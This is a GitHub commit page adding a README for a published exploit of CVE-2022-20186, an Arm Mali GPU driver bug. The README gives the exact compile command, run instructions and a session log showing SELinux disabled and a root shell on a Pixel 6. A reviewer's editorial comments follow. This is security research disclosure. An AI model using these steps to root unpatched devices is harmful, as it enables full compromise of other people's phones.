
Commit dc4b5a8

Merge pull request #724 from github/mali_38181
Blog material
2 parents 9335e32 + acfdbef commit dc4b5a8

6 files changed

Lines changed: 4132 additions & 0 deletions


Lines changed: 41 additions & 0 deletions
@@ -0,0 +1,41 @@
1+
## Exploit for CVE-2022-20186
2+
3+
The write up can be found [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug). This is a bug in the Arm Mali kernel driver that I reported in July 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
4+
5+
The exploit is tested on the Google Pixel 6. The original exploit that was sent to Google is included as `hello-jni.c` as a reference and was tested on the July 2022 patch of the Pixel 6. Due to the fact that Pixel 6 cannot be downgraded from Android 13 to Android 12, an updated version of the exploit, `mali_shrinker_mmap.c` is included, which supports various firmware in Android 13, including the December patch, which is the latest affected version. For reference, I used the following command to compile with clang in ndk-21:
6+
7+
```
8+
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_shrinker_mmap.c -o mali_shrinker_mmap
9+
```
10+
11+
The exploit should be run a couple of minutes after boot and should be fairly reliable. If successful, it should disable SELinux and gain root.
12+
13+
```
14+
oriole:/ $ /data/local/tmp/mali_shrinker_mmap
15+
fingerprint: google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys
16+
failed, retry.
17+
failed, retry.
18+
region freed 51
19+
read 0
20+
cleanup flush region
21+
jit_freed
22+
jit_free commit: 0 0
23+
Found freed_idx 0
24+
Found pgd 20, 769c414000
25+
overwrite addr : 7701100710 710
26+
overwrite addr : 7700f00710 710
27+
overwrite addr : 7701100710 710
28+
overwrite addr : 7700f00710 710
29+
overwrite addr : 7700d00710 710
30+
overwrite addr : 7700f00710 710
31+
overwrite addr : 7700d00710 710
32+
overwrite addr : 7701100fd4 fd4
33+
overwrite addr : 7700f00fd4 fd4
34+
overwrite addr : 7701100fd4 fd4
35+
overwrite addr : 7700f00fd4 fd4
36+
overwrite addr : 7700d00fd4 fd4
37+
overwrite addr : 7700f00fd4 fd4
38+
overwrite addr : 7700d00fd4 fd4
39+
result 50
40+
oriole:/ #
41+
```
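Review bot: the build instructions at lines 5 and 8 are underspecified: the prose says "compile with clang in ndk-21" while the command hard-codes the relative path `android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang`, so a reader cannot tell which NDK release is required or where it is expected to be unpacked. Suggest stating "NDK r21d, extracted in the current directory" (or replacing the prefix with a variable such as `$NDK_HOME`) and adding one sentence on what the `-DSHELL` define changes, since it is the only build option shown and is never explained. Minor: both code fences are untagged; tagging the compile command as `sh` and the captured session as `console` would render them distinctly. Also, "the December patch, which is the latest affected version" would be unambiguous as "December 2022" (the sample fingerprint `TQ1A.221205.011` already implies that date), and the sample output shows `failed, retry.` twice, so a line on whether the retry is automatic or needs a re-run would complete the "fairly reliable" claim at line 11.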
